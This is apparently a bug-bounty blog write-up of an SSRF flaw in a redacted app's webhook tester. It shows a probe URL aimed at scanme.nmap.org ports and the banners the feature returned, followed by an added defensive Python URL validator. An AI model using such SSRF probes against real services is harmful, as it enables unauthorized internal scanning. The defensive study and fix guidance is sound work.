Tuesday, August 13, 2019
SSRF Vulnerability in https://app.[REDACTED].com
Almost a year ago I found a simple SSRF vulnerability in a private program which allowed me to inject an SSRF payload through their Webhook.
There is a feature called "Test Webhook" on their application and, while trying some other kinds of vulnerability, I was able to trigger an SSRF on this feature.
So long story short, here's the report timeline and proof of concept of this issue.
--Proof of Concept--
1. Go to https://app.<REDACTED>.com/app/webhooks
2. In the "Test Webhook" input the test payload
In my test, I tried making a request from port 22, 21 and 80 (http://scanme.nmap.org:22) and the responses were:
Port 22: Response: Bad response: (u'wrong number of parts', 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10')
Port 21: Response: Response: Could not connect to remote server: No route to host: 101: Network is unreachable.
Port 80: Response: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<title>Go ahead and ScanMe!</title>
<link REL="SHORTCUT ICON" HREF="/shared/images/tiny-eyeicon.png" TYPE="image/png">
<META NAME="ROBOTS" CONTENT="NOARCHIVE">
<link rel="stylesheet" href="/shared/css/insecdb.css" type="text/css">
Report Title: SSRF in https://app.<REDACTED>.com/app/webhooks
Reported: 24 Oct 2018 22:21:32 UTC
Closed: 29 Oct 2018 20:07:02 UTC (Duplicate)
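For defenders, the responses above show two separate problems: the webhook tester connects to any host and port it is given, and it echoes the remote banner or body back to the user. The following is an added example, not code from the original post or from the affected application, sketching a destination check and a sanitized result message; the function names, the standard-ports-only policy and the `.test` host names are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

WEB_PORT = {"http": 80, "https": 443}  # assumption: only default web ports allowed

def resolve(host, port):
    """Default resolver: every address the host name maps to."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})

def check_webhook_url(url, resolver=resolve):
    """Return (True, vetted_ips) or (False, reason) for a user-supplied webhook URL."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a non-numeric or out-of-range port
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in WEB_PORT:
        return False, "scheme not allowed"
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    if port not in (None, WEB_PORT[parts.scheme]):
        return False, "port not allowed"
    try:
        addrs = resolver(parts.hostname, WEB_PORT[parts.scheme])
    except OSError:
        return False, "host does not resolve"
    # Reject if ANY resolved address is loopback, private, link-local, etc.
    if not addrs or any(not ipaddress.ip_address(a.split("%")[0]).is_global for a in addrs):
        return False, "destination is not a public address"
    return True, addrs

def user_visible_result(status_code=None, error=None):
    """Text shown by the test feature: a status only, never the body or raw error."""
    if error is not None:
        return "Delivery failed"
    return "Delivered (HTTP %d)" % status_code

# Constructed sample data so the example runs offline (not real DNS answers).
SAMPLE_DNS = {"hooks.partner.test": ["8.8.8.8"], "intranet.partner.test": ["10.0.0.5"],
              "mixed.partner.test": ["8.8.8.8", "127.0.0.1"],
              "169.254.169.254": ["169.254.169.254"]}

def sample_resolver(host, port):
    if host not in SAMPLE_DNS:
        raise OSError("unknown host")
    return SAMPLE_DNS[host]
```

The outbound request should then connect to one of the returned addresses instead of resolving the name a second time, so the vetted answer cannot change between check and use. Redirects should be disabled or each redirect target passed through the same check.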
So I hope you enjoy this write-up and have a great day everyone!